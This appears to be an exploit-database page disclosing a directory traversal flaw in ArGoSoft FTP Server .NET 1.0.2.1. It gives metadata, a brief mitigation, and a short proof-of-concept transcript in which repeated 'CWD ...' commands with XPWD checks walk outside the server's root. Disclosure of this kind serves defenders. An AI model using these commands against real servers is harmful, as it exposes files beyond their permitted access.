header-logo
Suggest Exploit
vendor:
FTP Server .NET
by:
dmnt
7,5
CVSS
HIGH
Directory Traversal
22
CWE
Product Name: FTP Server .NET
Affected Version From: 1.0.2.1
Affected Version To: 1.0.2.1
Patch Exists: NO
Related CWE: N/A
CPE: argosoft.com/files/apps/FtpServerSetup.msi
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows 7
2010

ArGoSoft FTP Server .NET v.1.0.2.1 directory traversal

ArGoSoft FTP Server .NET v.1.0.2.1 is vulnerable to directory traversal. An attacker can use the CWD command to traverse directories outside the web root directory. The XPWD command can be used to verify the current working directory.

Mitigation:

Ensure that the FTP server is configured to restrict access to the web root directory and its subdirectories.
Source

Exploit-DB raw data:

# Exploit Title: ArGoSoft FTP Server .NET v.1.0.2.1 directory traversal
# Date: 16.03.2010
# Author: dmnt
# Software Link: http://www.argosoft.com/files/apps/FtpServerSetup.msi
# Version: ArGoSoft FTP Server .NET v.1.0.2.1
# Tested on: Windows 7
# Code :
CWD ...
250 Requested file action OK, completed
XPWD
257 "/.../" is working directory
CWD ...
250 Requested file action OK, completed
XPWD
257 "/.../.../" is working directory

Navigation

Suggest Exploit

Services By CQR